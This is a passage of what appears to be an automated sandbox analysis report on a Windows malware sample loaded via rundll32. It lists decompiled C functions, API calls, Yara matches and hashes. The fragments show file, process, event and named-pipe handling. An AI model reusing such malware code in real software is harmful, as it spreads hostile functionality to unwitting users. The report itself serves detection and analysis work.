                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13; // write cursor after the separator
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1); // copy the tail including the terminating NUL
                                				}
                                				return _v12;
                                			}

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03431DC6,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 0343416D
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03434185
                                • memcpy.NTDLL(00000000,055E95B0,-00000008,?,?,?,03431DC6,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 034341C9
                                • memcpy.NTDLL(00000001,055E95B0,00000001,034358D7,00000000,055E95B0), ref: 034341EA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: d193ce997812913dd48f6f0f5e9edf8b4608ac0bff07c0e7a5c5667028831aa2
                                • Instruction ID: 7bd09b410c9e62d058c1721e0ca092e2851a77e15da340a9232b9f6b1d7ca1b4
                                • Opcode Fuzzy Hash: d193ce997812913dd48f6f0f5e9edf8b4608ac0bff07c0e7a5c5667028831aa2
                                • Instruction Fuzzy Hash: D411E776A00215BFC710DB6ADC88D9ABFFAEB95261B090166E544DB340E7719A0486A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GlobalFix.KERNEL32(00000000), ref: 0348223E
                                • memset.NTDLL ref: 03482252
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0348225F
                                  • Part of subcall function 0348C563: OpenProcess.KERNEL32(00000410,B8F475FF,03482289,00000000,00000000,03482289,0000001C,00000000,00000000,?,?,?,03482289), ref: 0348C5BD
                                  • Part of subcall function 0348C563: CloseHandle.KERNEL32(00000000,00000000,00000000,03482299,00000104,?,?,?,03482289), ref: 0348C5DB
                                  • Part of subcall function 0348C563: GetSystemTimeAsFileTime.KERNEL32(03482289), ref: 0348C643
                                • GlobalUnWire.KERNEL32(00000000), ref: 0348228A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                • String ID:
                                • API String ID: 3286078456-0
                                • Opcode ID: 4a0f037cf738fc0048f7c182cdc42ccf8afd0b596cbf965a0d08f20124283e03
                                • Instruction ID: 5692ef25b56f9cc0db67ba1020fedf9fd697fe0d7d9e8526422089b2351ebc45
                                • Opcode Fuzzy Hash: 4a0f037cf738fc0048f7c182cdc42ccf8afd0b596cbf965a0d08f20124283e03
                                • Instruction Fuzzy Hash: A8117075D00319ABDB12FBB5E889B9EBBF8AB18601F04421BE905FA384DB7585008B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0347AE46,00000000,00000000), ref: 03491C3D
                                • GetLastError.KERNEL32(?,?,?,0347AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0347EBC1,?,0000001E), ref: 03491C45
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide
                                • String ID:
                                • API String ID: 203985260-0
                                • Opcode ID: a307d94d8a8194596801a85c1488e4bb5f1ae03c9ac4e1710fe2b0f648c09da8
                                • Instruction ID: cbc2fba873ddd25423ea4b85a0270ef75c25a2afa25260b783016beaca8af1d5
                                • Opcode Fuzzy Hash: a307d94d8a8194596801a85c1488e4bb5f1ae03c9ac4e1710fe2b0f648c09da8
                                • Instruction Fuzzy Hash: 270188355083527F9B21EB769C4DC6BBFACEBC6770B200A5FF8659A280D7205805C675
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,?,?,00000000,?,?,03471D09,?,?,?,?,?,?,?,?,?), ref: 034727F4
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • mbstowcs.NTDLL ref: 0347280E
                                • lstrlen.KERNEL32(?), ref: 03472819
                                • mbstowcs.NTDLL ref: 03472833
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                • String ID:
                                • API String ID: 1961997177-0
                                • Opcode ID: 3fa1de9f71c28c254a356a983a0ff912e0d44c27eed82628877478990f6fda4f
                                • Instruction ID: e17c0d3526c45a3bb1ff1e56b377b7a4c8b7f47988a167ae9a6717854ee2861d
                                • Opcode Fuzzy Hash: 3fa1de9f71c28c254a356a983a0ff912e0d44c27eed82628877478990f6fda4f
                                • Instruction Fuzzy Hash: 81019277900305BBDB11FBA68C85FCF7BACDB84650F14452BB505AF100EAB5D90086A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?), ref: 03471B7E
                                • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 03471BA4
                                • lstrcpy.KERNEL32(00000014,?), ref: 03471BC9
                                • memcpy.NTDLL(?,?,?), ref: 03471BD6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 1388643974-0
                                • Opcode ID: e155acc7433fd0fa5996e68847deb51dc0055a4021fc18fce63b20c189c8c935
                                • Instruction ID: 841f6d3e7b19ec9032be2821dfc6d2e16b27fabad567c88906dd6e99f730e014
                                • Opcode Fuzzy Hash: e155acc7433fd0fa5996e68847deb51dc0055a4021fc18fce63b20c189c8c935
                                • Instruction Fuzzy Hash: C011497150020AEFC721DF58D844E9ABBF8FF49704F15855AF8599B211D771E904CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,03480D10,?,00000000,00000000), ref: 0348E04E
                                • lstrlen.KERNEL32(0616C178,?,03480D10,?,00000000,00000000), ref: 0348E06F
                                • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0348E087
                                • lstrcpy.KERNEL32(00000000,0616C178), ref: 0348E099
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                • String ID:
                                • API String ID: 1929783139-0
                                • Opcode ID: 8c3049036701cc5954f299d4a00caf72686b622c952cb3a28060c193955f1e62
                                • Instruction ID: db50da8e8a1cf53013592804087931e3cea471b262786698a02d756df468bd95
                                • Opcode Fuzzy Hash: 8c3049036701cc5954f299d4a00caf72686b622c952cb3a28060c193955f1e62
                                • Instruction Fuzzy Hash: F2010876900204EFC711EFA99844A5FBBFCAB5A200F15046AE906EB305D630C5448BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • RtlInitializeCriticalSection.NTDLL(0349A400), ref: 03485285
                                • RtlInitializeCriticalSection.NTDLL(0349A3E0), ref: 0348529B
                                • GetVersion.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852AC
                                • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852E0
                                  • Part of subcall function 034868AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,034852C3), ref: 034868C4
                                  • Part of subcall function 034868AC: LoadLibraryA.KERNEL32(?), ref: 03486965
                                  • Part of subcall function 034868AC: FreeLibrary.KERNEL32(00000000), ref: 03486970
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                • String ID:
                                • API String ID: 1711133254-0
                                • Opcode ID: 6e162c173dd5371a011c777b906b1a7f9a685c3b8528f3a7df041e53fbdb8e18
                                • Instruction ID: 86867198558464a1636ad6073a9d43395f1542c0db697b96a93e543718bf6567
                                • Opcode Fuzzy Hash: 6e162c173dd5371a011c777b906b1a7f9a685c3b8528f3a7df041e53fbdb8e18
                                • Instruction Fuzzy Hash: ED119275E803149FEB20FFADE989A097BE4F7AA210711056FE911EF348D7B448418F88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,0347B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 03489E17
                                • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 03489E2F
                                • memcpy.NTDLL(0000000C,?,00000001), ref: 03489E45
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0616C304,00000000,?,03476584,?), ref: 0347A90E
                                  • Part of subcall function 0347A8E9: StrTrimA.SHLWAPI(00000020,03495FCC,00000000,?,03476584,?), ref: 0347A92D
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,?,03476584,?), ref: 0347A939
                                • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 03489E77
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                • String ID:
                                • API String ID: 3208927540-0
                                • Opcode ID: 52c741047fe1ec7c142b526a322e34cc845a4ff83dade90b8eae66e1007b9a47
                                • Instruction ID: f9b3d3741aae2554d711aced7e233202a96a06b0919b9468270810f6a351d9ce
                                • Opcode Fuzzy Hash: 52c741047fe1ec7c142b526a322e34cc845a4ff83dade90b8eae66e1007b9a47
                                • Instruction Fuzzy Hash: 2E017135600B01ABD221AF56AC45F7BBFA8EF91B51F15402BB619BD180D770980AE664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0347253B
                                • Sleep.KERNEL32(0000000A), ref: 03472545
                                • SetEvent.KERNEL32 ref: 0347259C
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034725BB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterEventLeaveSleep
                                • String ID:
                                • API String ID: 1925615494-0
                                • Opcode ID: 0fe82705a4eb82cc0e94292322c22480c24024e02b67d66437181a5e96d32265
                                • Instruction ID: 268d586495a78815b91669b318093c75d6ace120c1453c9c65d16a9e6eb9faf5
                                • Opcode Fuzzy Hash: 0fe82705a4eb82cc0e94292322c22480c24024e02b67d66437181a5e96d32265
                                • Instruction Fuzzy Hash: 93019670640304FBEB11FB61DC4AF9A7AECEB25741F104457E605FE184D7B495048BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03490DDD: lstrlen.KERNEL32(?,?,00000000,03477BEE), ref: 03490DE2
                                  • Part of subcall function 03490DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 03490DF7
                                  • Part of subcall function 03490DDD: wsprintfA.USER32 ref: 03490E13
                                  • Part of subcall function 03490DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03490E2F
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 03477C06
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 03477C15
                                • CloseHandle.KERNEL32(00000000), ref: 03477C1F
                                • GetLastError.KERNEL32 ref: 03477C27
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                • String ID:
                                • API String ID: 4042893638-0
                                • Opcode ID: 8426a0ae43ea5d97560ee0e8f56da22f4d9f33ba26a2eb72b6b4c72ea4db4202
                                • Instruction ID: 6eb26cdb3e3a1b9e955898c44ca7cc22ae8a2cd2bd1c3928325a74261da785a1
                                • Opcode Fuzzy Hash: 8426a0ae43ea5d97560ee0e8f56da22f4d9f33ba26a2eb72b6b4c72ea4db4202
                                • Instruction Fuzzy Hash: 30F0F471101214BFDB21AF66DC89FEFBEACEF1AAA1F64411BF609AD184C630455186E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrcatW.KERNEL32(?,?), ref: 03484A5D
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0347E4AF,?,?,00001000,?,?,00001000), ref: 03484A80
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0347E4AF,?,?,00001000,?,?,00001000), ref: 03484AA2
                                • GetLastError.KERNEL32(?,0347E4AF,?,?,00001000,?,?,00001000), ref: 03484AB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                • String ID:
                                • API String ID: 3370347312-0
                                • Opcode ID: 061a963c8fae5585e069aa8b988a57a4bb8825475f75b46327dd30d29682b41d
                                • Instruction ID: 6c0b322861a05c7ec9705898a53e0caf9f16575dc27bcd84092ad14b27cff99e
                                • Opcode Fuzzy Hash: 061a963c8fae5585e069aa8b988a57a4bb8825475f75b46327dd30d29682b41d
                                • Instruction Fuzzy Hash: 69F0AF31244205BBDB12BF61AC0AF9E3AA9EF16310F240106FA02AC2D0E77151218BAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • InterlockedExchange.KERNEL32(0349A060,00000000), ref: 03478906
                                • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 03478921
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347894A
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0347896B
                                  • Part of subcall function 0347DC41: SetEvent.KERNEL32(00000000,?,0348507B), ref: 0347DC56
                                  • Part of subcall function 0347DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0348507B), ref: 0347DC76
                                  • Part of subcall function 0347DC41: CloseHandle.KERNEL32(00000000,?,0348507B), ref: 0347DC7F
                                  • Part of subcall function 0347DC41: CloseHandle.KERNEL32(00000000,?,?,0348507B), ref: 0347DC89
                                  • Part of subcall function 0347DC41: RtlEnterCriticalSection.NTDLL(?), ref: 0347DC91
                                  • Part of subcall function 0347DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 0347DCA9
                                  • Part of subcall function 0347DC41: CloseHandle.KERNEL32(00000000), ref: 0347DCC5
                                  • Part of subcall function 0347DC41: LocalFree.KERNEL32(?), ref: 0347DCD0
                                  • Part of subcall function 0347DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 0347DCDA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                • String ID:
                                • API String ID: 1103286547-0
                                • Opcode ID: 744c3e4eaff52d84cd1a73469f48ca787ddfaab80d7a7c0ac71a0d771b5f31d4
                                • Instruction ID: b8b1eef8942bc3dae87a43f4f1efca83ea414da0c69ae7e2b317b4cc59872f3a
                                • Opcode Fuzzy Hash: 744c3e4eaff52d84cd1a73469f48ca787ddfaab80d7a7c0ac71a0d771b5f31d4
                                • Instruction Fuzzy Hash: BDF0C8357403117BDA31BF22AC0EF4B3E98DF92761F160017B605FE288DA649805D7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 0348D601
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0347DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0348D616
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,03473EC6,?,?), ref: 0348D623
                                • CloseHandle.KERNEL32(?,?,?,?,03473EC6,?,?), ref: 0348D635
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: e0d863238503dd28270bce2497b1bbcaa424ff07f73660b5fc210059201a5a01
                                • Instruction ID: 2ff0fa58ad676ebb0b1e6d8eb3e36834f07f33e811f6495e97e57e4960c86755
                                • Opcode Fuzzy Hash: e0d863238503dd28270bce2497b1bbcaa424ff07f73660b5fc210059201a5a01
                                • Instruction Fuzzy Hash: 5EF089B150530C7FD310BF26DCC4C2BFBDCEB57298B25492FF146A5151C675A8054A74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0343227F(void* __esi) {
                                				struct _SECURITY_ATTRIBUTES* _v4; /* used only as the success flag that is returned */
                                				void* _t8;
                                				void* _t10;
                                
                                				_v4 = 0;
                                				memset(__esi, 0, 0x38); /* zero the 0x38-byte context structure passed in ESI */
                                				_t8 = CreateEventA(0, 1, 0, 0); /* manual-reset event, initially non-signaled */
                                				 *(__esi + 0x1c) = _t8;
                                				if(_t8 != 0) {
                                					_t10 = CreateEventA(0, 1, 1, 0); /* manual-reset event, initially signaled */
                                					 *(__esi + 0x20) = _t10;
                                					if(_t10 == 0) {
                                						CloseHandle( *(__esi + 0x1c)); /* second event failed: release the first one */
                                					} else {
                                						_v4 = 1; /* both events created */
                                					}
                                				}
                                				return _v4;
                                			}


                                APIs
                                • memset.NTDLL ref: 0343228D
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76CC81D0,00000000,00000000), ref: 034322A2
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 034322AF
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 034322C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 9855b5fad46fc729f2e010e0e5334ad3a3dddb120df9e3194ca78e056466433f
                                • Instruction ID: 2521f9ad3fcea3f4b4989c1c1a555d5532c94f0f0df0323c0449e82bf7bc47df
                                • Opcode Fuzzy Hash: 9855b5fad46fc729f2e010e0e5334ad3a3dddb120df9e3194ca78e056466433f
                                • Instruction Fuzzy Hash: 18F05EF510470C7FD320AF62DCC4C2BFBECEB461A8B114D2EF14697211C6B1A8098AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,03474BD6,000000FF,0616B7F0,?,?,0348B7F2,0000003A,0616B7F0), ref: 03484AE0
                                • GetLastError.KERNEL32(?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008), ref: 03484AEB
                                • WaitNamedPipeA.KERNEL32(00002710), ref: 03484B0D
                                • WaitForSingleObject.KERNEL32(00000000,?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C), ref: 03484B1B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                • String ID:
                                • API String ID: 4211439915-0
                                • Opcode ID: 7b932f73e40546573f3f8cfedeb248095e028d09496525d489b103de5e0354d4
                                • Instruction ID: e7b6dcb868cce822b751bf819090eaefc6991defaf25b2a2616497a9817c2567
                                • Opcode Fuzzy Hash: 7b932f73e40546573f3f8cfedeb248095e028d09496525d489b103de5e0354d4
                                • Instruction Fuzzy Hash: 25F06231A01121ABD2217B6AAC4EB5BBA99DF11365F254263F919BE294C6600841C694
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,?,00000000,03477BEE), ref: 03490DE2
                                • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 03490DF7
                                • wsprintfA.USER32 ref: 03490E13
                                  • Part of subcall function 0348C01F: memset.NTDLL ref: 0348C034
                                  • Part of subcall function 0348C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0348C06D
                                  • Part of subcall function 0348C01F: wcstombs.NTDLL ref: 0348C077
                                  • Part of subcall function 0348C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0348C0A8
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0D4
                                  • Part of subcall function 0348C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0348C0EA
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0FE
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C131
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C136
                                • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03490E2F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                • String ID:
                                • API String ID: 1624158581-0
                                • Opcode ID: f38abb9933d9ba03c2b1c3393e5cf7980a7cba4bf354c108bd97b7ca9b2be2f3
                                • Instruction ID: f418b4c1e4ad1f3df78d4de191c9eb89e8f1a4212dfaac01c36d931fcca63426
                                • Opcode Fuzzy Hash: f38abb9933d9ba03c2b1c3393e5cf7980a7cba4bf354c108bd97b7ca9b2be2f3
                                • Instruction Fuzzy Hash: 51F054315011107BDA216B1AAC09F5B7FECDBD3761F160157F905FE299D624884686A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 03476540
                                • Sleep.KERNEL32(0000000A), ref: 0347654A
                                • HeapFree.KERNEL32(00000000,?), ref: 03476572
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03476590
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: fa4921cdde1c78a2ccbe61e9961aa618a8a57632ccd7f1fca49fd8526c8006a0
                                • Instruction ID: ea5e1568d2dd603b1c662afa16ab8ca74419e18c4d79bfa42a5306ccae1117fb
                                • Opcode Fuzzy Hash: fa4921cdde1c78a2ccbe61e9961aa618a8a57632ccd7f1fca49fd8526c8006a0
                                • Instruction Fuzzy Hash: 44F05E70200240DFE721EF29E849F5A7BE9AF25340F16845BF906FE259D734E844DB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03437607() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x343a30c; // 0x2cc  (global event handle)
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1); /* signal the shutdown event to the worker threads */
                                				_t11 = 0x7fffffff; /* remaining wait budget in milliseconds */
                                				while(1) {
                                					SleepEx(0x64, 1); /* alertable 100 ms sleep */
                                					_t5 =  *0x343a35c; // 0x0  (global "workers still running" flag)
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
